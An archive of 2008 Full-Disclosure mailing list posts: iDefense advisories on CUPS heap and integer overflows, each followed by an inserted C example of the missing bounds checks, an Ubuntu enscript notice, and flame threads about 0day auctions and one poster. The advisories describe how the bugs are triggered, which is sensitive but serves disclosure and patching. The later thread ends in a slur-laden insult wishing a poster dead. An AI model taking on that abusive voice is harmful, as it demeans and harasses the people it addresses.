> * n3td3v wrote:
>> ---------- Forwarded message ----------
>> From: n3td3v
>> Date: Mon, Nov 3, 2008 at 1:15 PM
>> Subject: 0day auctions, should they be outlawed?
>> To: n3td3v
>>
>>
>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>> of 0day sales on the internet. i've noticed an increased level in 0day
>> sales lately on mailing lists, and web sites... i think this should be
>> against the law. let me know what your opinions are on this, so i can
>> form what im going to say when i lobby people about it. cheers.
>
> wrong approach. there should be a law that the state has to buy
> all 0days and publish them here on undisclosure. that would be
> good use of tax money... ;)
>

the latest guy put up an alias that says "anti security" and i guess demanded money to make the 0day be known, and then there is still no guarantee that the affected vendor or the government is going to get wind of the exploit. that means, there is going to need to be a government task force in place to infiltrate these sales, to make sure the good guys are getting the info before blackhat elements. is there already a government strike force in place to buy these "0day offers"? or are the government sitting on their hand as per usual? im becoming increasingly frustrated about what is going on. cheers.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From xploitable at gmail.com Mon Nov 3 20:24:41 2008
From: xploitable at gmail.com (n3td3v)
Date: Mon, 3 Nov 2008 20:24:41 +0000
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
    <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
    <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
Message-ID: <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>

are you fucking stalking me? how do you know how long i was away for etc? have you got obsessive compulsive disorder that you need to reply to my every post and tell me how long i've been away for? gtfo.

On Mon, Nov 3, 2008 at 7:21 PM, Ureleet wrote:
> btw -- it was nice and sane and quiet on the list for like a week
> without you here. go back 2 wherever you were.

From labs-no-reply at idefense.com Mon Nov 3 21:33:56 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 03 Nov 2008 16:33:56 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.03.08: Multiple Vendor CUPS SGI imagetops Heap Overflow Vulnerability
Message-ID: <490F6E44.4060802@idefense.com>

iDefense Security Advisory 10.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 09, 2008

I. BACKGROUND

The Common UNIX Printing System, more commonly referred to as CUPS, provides a standard printer interface for various Unix based operating systems. "imagetops" is a part of CUPS responsible for creating PostScript representations of different graphic file formats.
For more information, visit the vendor's website at the following URL.

http://www.cups.org/

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in CUPS, as included in various vendors' operating system distributions, could allow an attacker to execute arbitrary code with the privileges of the affected service.

The Common Unix Printing System, more commonly referred to as CUPS, provides a standard printer interface for various Unix-based operating systems. The Silicon Graphics Image (SGI) file format parsing module is vulnerable to a heap-based buffer overflow vulnerability when parsing malformed Run Length Encoded (RLE) data.

The vulnerability exists within the read_rle16() function. This function doesn't correctly validate the row count value taken from the file, which is then used to control how many 16-bit integers to store into a heap-based buffer. By providing small image dimensions and a large row count, it is possible to trigger a heap-based buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. Depending on the underlying operating system and distribution, CUPS may run as the lp, daemon or a different user.

Exploiting heap overflow vulnerabilities on modern Unix systems can be difficult due to various heap protection schemes; however, the attacker has very fine-grained control over the overflow, which somewhat eases the difficulty of exploitation.

To exploit this vulnerability remotely, the targeted host must be sharing a printer(s) on the network. If a printer is not being shared, CUPS only listens on the localhost interface, and the scope of this vulnerability would be limited to local privilege escalation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in CUPS version 1.3.7. Previous versions may also be affected.

V. WORKAROUND

Disabling printer sharing will prevent this vulnerability from being exploited remotely; however, local exploitation is still possible.

VI. VENDOR RESPONSE

CUPS.org has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://www.cups.org/str.php?L2918

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

09/02/2008 Initial Vendor Notification
10/09/2008 Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
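
The bounds check that the advisory above describes as missing, shown as an added example that is not part of the advisory and is not CUPS source code. The function names, the in-memory input and the simplified RLE layout described in the comment are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define CANARY 0xA5A5u  /* guard value placed after the row in the demos */

/* Fetch one big-endian 16-bit word; fails instead of reading past the input. */
static int get_be16(const uint8_t *in, size_t in_len, size_t *pos, uint16_t *out)
{
    if (*pos > in_len || in_len - *pos < 2)
        return -1;
    *out = (uint16_t)(((unsigned)in[*pos] << 8) | in[*pos + 1]);
    *pos += 2;
    return 0;
}

/*
 * Decode one RLE row of 16-bit samples into row[0 .. xsize-1].
 * Assumed layout (modelled on SGI RLE, simplified): each control word holds a
 * run length in its low 7 bits; bit 7 set means "copy that many literal
 * words", clear means "repeat the next word that many times"; 0 ends the row.
 * Returns the number of input bytes consumed, or -1 for malformed input.
 */
long rle16_decode_row(const uint8_t *in, size_t in_len,
                      uint16_t *row, size_t xsize)
{
    size_t pos = 0, filled = 0, count, i;
    uint16_t word, value;

    for (;;) {
        if (get_be16(in, in_len, &pos, &word) != 0)
            return -1;
        count = word & 0x7f;
        if (count == 0)
            break;

        /* The run length comes from the file, so it is compared with the
         * space left in the row before a single sample is stored. */
        if (count > xsize - filled)
            return -1;

        if (word & 0x80) {              /* literal run */
            for (i = 0; i < count; i++) {
                if (get_be16(in, in_len, &pos, &value) != 0)
                    return -1;
                row[filled++] = value;
            }
        } else {                        /* repeated value */
            if (get_be16(in, in_len, &pos, &value) != 0)
                return -1;
            for (i = 0; i < count; i++)
                row[filled++] = value;
        }
    }
    /* Strict policy chosen for this example: the row must be filled exactly. */
    return filled == xsize ? (long)pos : -1;
}

/* Constructed sample: a well-formed 4-sample row (repeat x3, one literal). */
long demo_valid_row(void)
{
    static const uint8_t in[] = { 0x00, 0x03, 0x12, 0x34,
                                  0x00, 0x81, 0xBE, 0xEF, 0x00, 0x00 };
    uint16_t row[5] = { 0, 0, 0, 0, CANARY };
    long used = rle16_decode_row(in, sizeof in, row, 4);

    if (row[0] != 0x1234 || row[2] != 0x1234 || row[3] != 0xBEEF ||
        row[4] != CANARY)
        return -2;
    return used;
}

/* Constructed sample: small row, run length of 127 taken from the input. */
long demo_oversized_run(void)
{
    static const uint8_t in[] = { 0x00, 0x7F, 0x41, 0x41, 0x00, 0x00 };
    uint16_t row[5] = { 0, 0, 0, 0, CANARY };
    long r = rle16_decode_row(in, sizeof in, row, 4);

    return (row[0] == 0 && row[4] == CANARY) ? r : -2;
}

/* Constructed sample: literal run that claims more words than the input has. */
long demo_truncated_literal(void)
{
    static const uint8_t in[] = { 0x00, 0x82, 0x00, 0x01 };
    uint16_t row[4] = { 0, 0, 0, 0 };

    return rle16_decode_row(in, sizeof in, row, 4);
}

int main(void)
{
    printf("valid row: %ld bytes consumed\n", demo_valid_row());
    printf("oversized run: %ld\n", demo_oversized_run());
    printf("truncated literal: %ld\n", demo_truncated_literal());
    return 0;
}
```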

From labs-no-reply at idefense.com Mon Nov 3 21:05:38 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Mon, 03 Nov 2008 16:05:38 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.03.08: Multiple Vendor CUPS texttops Integer Overflow Vulnerability
Message-ID: <490F67A2.8090602@idefense.com>

iDefense Security Advisory 10.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 09, 2008

I. BACKGROUND

The Common UNIX Printing System, more commonly referred to as CUPS, provides a standard printer interface for various Unix based operating systems. "texttops" is a part of CUPS responsible for creating PostScript representations of text files. For more information, visit the vendor's website at the following URL.

http://www.cups.org/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in CUPS, as included in various vendors' operating system distributions, could allow an attacker to execute arbitrary code with the privileges of the affected service.

The vulnerability exists within the WriteProlog() function in the "texttops" application. When calculating the page size used for storing PostScript data, multiple values that are derived from attacker-controlled content are used in a multiplication operation. This calculation can overflow, resulting in an incorrect result for the total page size. This value is then used to allocate a heap buffer that is later filled with attacker controlled content, resulting in a heap buffer overflow.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. Depending on the underlying operating system and distribution, CUPS may run as the lp, daemon or a different user.

Exploiting heap overflow vulnerabilities on modern Unix systems can be difficult due to various heap protection schemes; however, iDefense has proof-of-concept exploit code that demonstrates code execution is possible.

To exploit this vulnerability remotely, the targeted host must be sharing a printer(s) on the network. If a printer is not being shared, CUPS only listens on the localhost interface, and the scope of this vulnerability would be limited to local privilege escalation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in CUPS version 1.3.7. Previous versions may also be affected.

V. WORKAROUND

Disabling printer sharing will prevent this vulnerability from being exploited remotely. However, local exploitation is still possible.

VI. VENDOR RESPONSE

CUPS.org has released a patch which addresses this issue. For more information, consult their advisory at the following URL.

http://www.cups.org/str.php?L2919

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

09/02/2008 Initial Vendor Notification
10/09/2008 Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
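
How a page-size multiplication of the kind described in the advisory above can wrap, and one way to guard the allocation and the later writes. This is an added example, not part of the advisory and not texttops code: the names, the 32-bit unsigned arithmetic and the size ceiling are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Policy ceiling for one page buffer; the value is chosen for this example. */
#define MAX_PAGE_BYTES (64u * 1024u * 1024u)

struct page {
    uint32_t columns, lines, cell_bytes;
    uint8_t *data;
};

/* Unchecked form: the 32-bit product silently wraps modulo 2^32, so the
 * result can be far smaller than the space the caller goes on to fill. */
uint32_t page_bytes_naive(uint32_t columns, uint32_t lines, uint32_t cell_bytes)
{
    return columns * lines * cell_bytes;
}

/* Checked form: every factor is tested by division before it is multiplied
 * in. Returns the byte count, or -1 when a factor is zero or the product
 * would exceed MAX_PAGE_BYTES (which also rules out any wrap). */
int64_t page_bytes_checked(uint32_t columns, uint32_t lines, uint32_t cell_bytes)
{
    uint32_t cells;

    if (columns == 0 || lines == 0 || cell_bytes == 0)
        return -1;
    if (lines > MAX_PAGE_BYTES / columns)
        return -1;
    cells = columns * lines;
    if (cell_bytes > MAX_PAGE_BYTES / cells)
        return -1;
    return (int64_t)cells * cell_bytes;
}

/* Allocate a zeroed page only when the size calculation is trustworthy. */
struct page *page_create(uint32_t columns, uint32_t lines, uint32_t cell_bytes)
{
    int64_t bytes = page_bytes_checked(columns, lines, cell_bytes);
    struct page *p;

    if (bytes < 0)
        return NULL;
    p = malloc(sizeof *p);
    if (p == NULL)
        return NULL;
    p->data = calloc(1, (size_t)bytes);
    if (p->data == NULL) {
        free(p);
        return NULL;
    }
    p->columns = columns;
    p->lines = lines;
    p->cell_bytes = cell_bytes;
    return p;
}

/* Bounds-checked access: the fill loop goes through this function and never
 * computes an offset from unvalidated coordinates. */
uint8_t *page_cell(struct page *p, uint32_t col, uint32_t line)
{
    if (p == NULL || col >= p->columns || line >= p->lines)
        return NULL;
    return p->data + ((size_t)line * p->columns + col) * p->cell_bytes;
}

void page_free(struct page *p)
{
    if (p != NULL) {
        free(p->data);
        free(p);
    }
}

/* Constructed sample: an ordinary 80x66 page with 8-byte cells. */
int demo_sane_page(void)
{
    struct page *p = page_create(80, 66, 8);
    uint8_t *last;
    int ok;

    if (p == NULL)
        return 0;
    last = page_cell(p, 79, 65);
    ok = last != NULL && page_cell(p, 80, 0) == NULL
                      && page_cell(p, 0, 66) == NULL;
    if (ok)
        last[7] = 0xff;   /* last byte of the last cell is inside the buffer */
    page_free(p);
    return ok;
}

int main(void)
{
    /* Constructed dimensions whose true product is 2^32 + 65536. */
    printf("naive:   %u bytes\n", (unsigned)page_bytes_naive(65537u, 8192u, 8u));
    printf("checked: %lld\n", (long long)page_bytes_checked(65537u, 8192u, 8u));
    printf("sane page ok: %d\n", demo_sane_page());
    return 0;
}
```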

From erc at pobox.com Mon Nov 3 21:58:34 2008
From: erc at pobox.com (Ed Carp)
Date: Mon, 3 Nov 2008 13:58:34 -0800
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
    <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
    <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
    <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
Message-ID: <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>

Jesus ... you guys need to get back on your lithium...

From p.labushev at gmail.com Mon Nov 3 22:07:17 2008
From: p.labushev at gmail.com (Pavel Labushev)
Date: Tue, 04 Nov 2008 05:07:17 +0700
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <45950.1225688371@turing-police.cc.vt.edu>
    <4e324cb0811030208k16bee8c1ibe9a6f90c2775f46@mail.gmail.com>
Message-ID: <490F7615.8030203@gmail.com>

mcwidget wrote:
> What we *don't* know how to do is make a system that Joe Sixpack is
> allowed
> to screw around with, and yet prevent security issues from happening.

It's not a user's fault that C-like languages' runtime is vulnerable by design. And it's certainly not a user's fault that C-like languages are being widely used.

It's not a user's fault that most of widely used hardware platforms and OSes are lacking of any advanced secure task isolation. And it's certainly not a user's fault that the currently available isolation functionality is being misused and overestimated everywhere.

It's not a user's fault that most of widely used software, including OSes, and protocols has been designed and implemented mostly without security in mind.

It's mostly the industry's fault. And the industry earns much from it.
I wouldn't blame users, because they are a minor evil in this story.

From and.email.cash at gmail.com Mon Nov 3 22:45:54 2008
From: and.email.cash at gmail.com (Email Cash)
Date: Mon, 3 Nov 2008 22:45:54 +0000
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <43a365c5$17e8ef99$d9ff1b0$@com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
Message-ID: <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>

I think that ZDI/TippingPoint and the other legit private outfits have been doing a pretty decent job so far. Why bring the law into it?

On Mon, Nov 3, 2008 at 7:29 PM, william at lefkovics.net wrote:
> There should be a FD listing fee for the 0day so the list can garner a
> commission from the sale.
>
> Absolutely no increase in government should be directed toward 0day sale
> prevention or enforcement.
> The answer to these things rarely should include the words 'government',
> 'task' and 'force'.
>
>
> ________________________________
> From: "n3td3v"
> Sent: Monday, November 03, 2008 11:00 AM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
>
> On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
>> * n3td3v wrote:
>>> ---------- Forwarded message ----------
>>> From: n3td3v
>>> Date: Mon, Nov 3, 2008 at 1:15 PM
>>> Subject: 0day auctions, should they be outlawed?
>>> To: n3td3v
>>>
>>>
>>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>>> of 0day sales on the internet. i've noticed an increased level in 0day
>>> sales lately on mailing lists, and web sites... i think this should be
>>> against the law. let me know what your opinions are on this, so i can
>>> form what im going to say when i lobby people about it. cheers.
>>
>> wrong approach. there should be a law that the state has to buy
>> all 0days and publish them here on undisclosure. that would be
>> good use of tax money... ;)
>>
>
> the latest guy put up an alias that says "anti security" and i guess
> demanded money to make the 0day be known, and then there is still no
> guarantee that the affected vendor or the government is going to get
> wind of the exploit. that means, there is going to need to be a
> government task force in place to infiltrate these sales, to make sure
> the good guys are getting the info before blackhat elements. is there
> already a government strike force in place to buy these "0day offers"?
> or are the government sitting on their hand as per usual? im becoming
> increasingly frustrated about what is going on. cheers.
>

From vulcanius at gmail.com Mon Nov 3 23:06:39 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 18:06:39 -0500
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
    <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
    <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
    <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
    <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
Message-ID:

Actually I think a new game should be created that revolves around stalking n3td3v. Points would be awarded for the quickest response to each of his worthless posts. At the end of the month a Stalker of the Month could be selected and given a prize.
Bonus points could be given out for the most degrading responses. I think it could be a lot of fun.

On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
> Jesus ... you guys need to get back on your lithium...
>

From vulcanius at gmail.com Mon Nov 3 23:00:30 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 18:00:30 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
References: <43a365c5$17e8ef99$d9ff1b0$@com>
    <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
Message-ID:

Because n3td3v is paranoid and believes the government should run just about everything.

On Mon, Nov 3, 2008 at 5:45 PM, Email Cash wrote:
> I think that ZDI/TippingPoint and the other legit private outfits have
> been doing a pretty decent job so far. Why bring the law into it?
>
>
> On Mon, Nov 3, 2008 at 7:29 PM, william at lefkovics.net
> wrote:
> > There should be a FD listing fee for the 0day so the list can garner a
> > commission from the sale.
> >
> > Absolutely no increase in government should be directed toward 0day sale
> > prevention or enforcement.
> > The answer to these things rarely should include the words 'government',
> > 'task' and 'force'.
> >
> >
> > ________________________________
> > From: "n3td3v"
> > Sent: Monday, November 03, 2008 11:00 AM
> > To: full-disclosure at lists.grok.org.uk
> > Subject: Re: [Full-disclosure] Fwd: 0day auctions, should they be
> outlawed?
> >
> > On Mon, Nov 3, 2008 at 6:49 PM, Marc Balmer wrote:
> >> * n3td3v wrote:
> >>> ---------- Forwarded message ----------
> >>> From: n3td3v
> >>> Date: Mon, Nov 3, 2008 at 1:15 PM
> >>> Subject: 0day auctions, should they be outlawed?
> >>> To: n3td3v
> >>>
> >>>
> >>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
> >>> of 0day sales on the internet. i've noticed an increased level in 0day
> >>> sales lately on mailing lists, and web sites... i think this should be
> >>> against the law. let me know what your opinions are on this, so i can
> >>> form what im going to say when i lobby people about it. cheers.
> >>
> >> wrong approach. there should be a law that the state has to buy
> >> all 0days and publish them here on undisclosure. that would be
> >> good use of tax money... ;)
> >>
> >
> > the latest guy put up an alias that says "anti security" and i guess
> > demanded money to make the 0day be known, and then there is still no
> > guarantee that the affected vendor or the government is going to get
> > wind of the exploit. that means, there is going to need to be a
> > government task force in place to infiltrate these sales, to make sure
> > the good guys are getting the info before blackhat elements. is there
> > already a government strike force in place to buy these "0day offers"?
> > or are the government sitting on their hand as per usual? im becoming
> > increasingly frustrated about what is going on. cheers.
> >

From michael.boman at gmail.com Mon Nov 3 23:12:13 2008
From: michael.boman at gmail.com (Michael Boman)
Date: Tue, 4 Nov 2008 00:12:13 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To:
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com>
    <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
    <4b6ee9310811030934q511033baq40c75ca510914dc@mail.gmail.com>
    <6158bb410811031121t2dc3bf41t1cac4d33a1e87db9@mail.gmail.com>
    <4b6ee9310811031224p78649479i128e4ec3281af097@mail.gmail.com>
    <1b0d006c0811031358hf33ce3eka4dd85e4699a7e2c@mail.gmail.com>
Message-ID: <48989dd70811031512x64568ac1x2d66b5ed368ad57a@mail.gmail.com>

I already have a drinking game going, awarding myself a drink for every time n3td3v says something stupid, and every time I play it I run out of booze or blacks out... Dangerous stuff...

If you are in my area we can play it together sometime...

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 12:06 AM, vulcanius wrote:
> Actually I think a new game should be created that revolves around stalking
> n3td3v. Points would be awarded for the quickest response to each of his
> worthless posts. At the end of the month a Stalker of the Month could be
> selected and given a prize. Bonus points could be given out for the most
> degrading responses. I think it could be a lot of fun.
>
> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
>>
>> Jesus ... you guys need to get back on your lithium...
>>

--
http://michaelboman.org - Security Blog & Wiki

From kees at ubuntu.com Tue Nov 4 00:14:42 2008
From: kees at ubuntu.com (Kees Cook)
Date: Mon, 3 Nov 2008 16:14:42 -0800
Subject: [Full-disclosure] [USN-660-1] enscript vulnerability
Message-ID: <20081104001442.GE9448@outflux.net>

===========================================================
Ubuntu Security Notice USN-660-1          November 03, 2008
enscript vulnerability
CVE-2008-3863, CVE-2008-4306
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  enscript    1.6.4-7ubuntu0.2

Ubuntu 7.10:
  enscript    1.6.4-11ubuntu0.2

Ubuntu 8.04 LTS:
  enscript    1.6.4-12ubuntu0.8.04.1

Ubuntu 8.10:
  enscript    1.6.4-12ubuntu0.8.10.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Härnhammar discovered multiple stack overflows in enscript's handling of special escape arguments. If a user or automated system were tricked into processing a malicious file with the "-e" option enabled, a remote attacker could execute arbitrary code or cause enscript to crash, possibly leading to a denial of service.

From elazar at hushmail.com Tue Nov 4 01:38:40 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Mon, 03 Nov 2008 20:38:40 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <20081104013841.3CEA52003F@smtp.hushmail.com>

What's your poison of choice?

On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it I
>run out of booze or blacks out... Dangerous stuff... If you are in my
>area we can play it together sometime...
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius wrote:
>> Actually I think a new game should be created that revolves around stalking
>> n3td3v. Points would be awarded for the quickest response to each of his
>> worthless posts. At the end of the month a Stalker of the Month could be
>> selected and given a prize. Bonus points could be given out for the most
>> degrading responses. I think it could be a lot of fun.
>>
>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
>>>
>>> Jesus ... you guys need to get back on your lithium...
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>
>--
>http://michaelboman.org - Security Blog & Wiki

From Valdis.Kletnieks at vt.edu Tue Nov 4 02:25:45 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 21:25:45 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: Your message of "Mon, 03 Nov 2008 18:00:30 EST."
References: <43a365c5$17e8ef99$d9ff1b0$@com> <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com>
Message-ID: <112489.1225765545@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 18:00:30 EST, vulcanius said:
> Because n3td3v is paranoid and believes the government should run just about
> everything.

No, paranoid means you think the government already does run just about
everything, whether or not you think it should. :)

From vulcanius at gmail.com Tue Nov 4 03:19:24 2008
From: vulcanius at gmail.com (vulcanius)
Date: Mon, 3 Nov 2008 22:19:24 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <112489.1225765545@turing-police.cc.vt.edu>
References: <43a365c5$17e8ef99$d9ff1b0$@com> <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com> <112489.1225765545@turing-police.cc.vt.edu>
Message-ID:

Actually in the case of n3td3v I believe his paranoia is that everyone
_except_ the government is out to get him. Black hats, white hats, 83 year
old grandmothers, the lot of 'em. Remember now, according to himself he IS a
researcher exploring the seedy underbelly of the interwebs and its
inhabitants, all of which apparently frequent security mailing lists.

On Mon, Nov 3, 2008 at 9:25 PM, wrote:
> On Mon, 03 Nov 2008 18:00:30 EST, vulcanius said:
>
> > Because n3td3v is paranoid and believes the government should run just about
> > everything.
>
> No, paranoid means you think the government already does run just about
> everything, whether or not you think it should. :)

From Valdis.Kletnieks at vt.edu Tue Nov 4 03:45:54 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 03 Nov 2008 22:45:54 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: Your message of "Mon, 03 Nov 2008 22:19:24 EST."
References: <43a365c5$17e8ef99$d9ff1b0$@com> <6545a5ad0811031445m4d208ca8l9764000cbace3b4d@mail.gmail.com> <112489.1225765545@turing-police.cc.vt.edu>
Message-ID: <116308.1225770354@turing-police.cc.vt.edu>

On Mon, 03 Nov 2008 22:19:24 EST, vulcanius said:
> Actually in the case of n3td3v I believe his paranoia is that everyone
> _except_ the government is out to get him. Black hats, white hats, 83 year
> old grandmothers, the lot of 'em. Remember now, according to himself he IS a
> researcher exploring the seedy underbelly of the interwebs and its
> inhabitants, all of which apparently frequent security mailing lists.

His list has 5,000 alleged people (quite probably a lot are actually sock
puppets)

There's 600 million Internet users.

He's 599,995,000 users short.

From michael.boman at gmail.com Tue Nov 4 05:17:17 2008
From: michael.boman at gmail.com (Michael Boman)
Date: Tue, 4 Nov 2008 06:17:17 +0100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To: <20081104013841.3CEA52003F@smtp.hushmail.com>
References: <20081104013841.3CEA52003F@smtp.hushmail.com>
Message-ID: <48989dd70811032117wbbd7c40l5066c1559412a202@mail.gmail.com>

Beer and Whiskey, unless you have a good Russian vodka - the Swedish
ones ain't that good compared to the Russians.

Best regards
Michael Boman

On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad wrote:
> What's your poison of choice?
>
> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman wrote:
>>I already have a drinking game going, awarding myself a drink for
>>every time n3td3v says something stupid, and every time I play it I
>>run out of booze or blacks out... Dangerous stuff... If you are in my
>>area we can play it together sometime...
>>
>>Best regards
>>Michael Boman
>>
>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius wrote:
>>> Actually I think a new game should be created that revolves around stalking
>>> n3td3v. Points would be awarded for the quickest response to each of his
>>> worthless posts. At the end of the month a Stalker of the Month could be
>>> selected and given a prize. Bonus points could be given out for the most
>>> degrading responses. I think it could be a lot of fun.
>>>
>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
>>>>
>>>> Jesus ... you guys need to get back on your lithium...
>>
>>--
>>http://michaelboman.org - Security Blog & Wiki

--
http://michaelboman.org - Security Blog & Wiki

From biz.marqee at gmail.com Tue Nov 4 06:26:23 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Tue, 4 Nov 2008 17:26:23 +1100
Subject: [Full-disclosure] Securing our computers?
In-Reply-To:
References: <4b6ee9310811012238l49b57897m4f62dc7b7842741d@mail.gmail.com> <4b6ee9310811030900v41c27448qec40180125d5d962@mail.gmail.com>
Message-ID:

"so i suggest you don't fuck with n3td3v"
--SNIP--

LOL. What can you do? You dumb cunt, I'll fuck with you all day long until
you get the picture that no one gives a fuck what you say and everyone looks
forward to the day you expire.

Why are you so incapable of grasping the fact that no one cares about you at
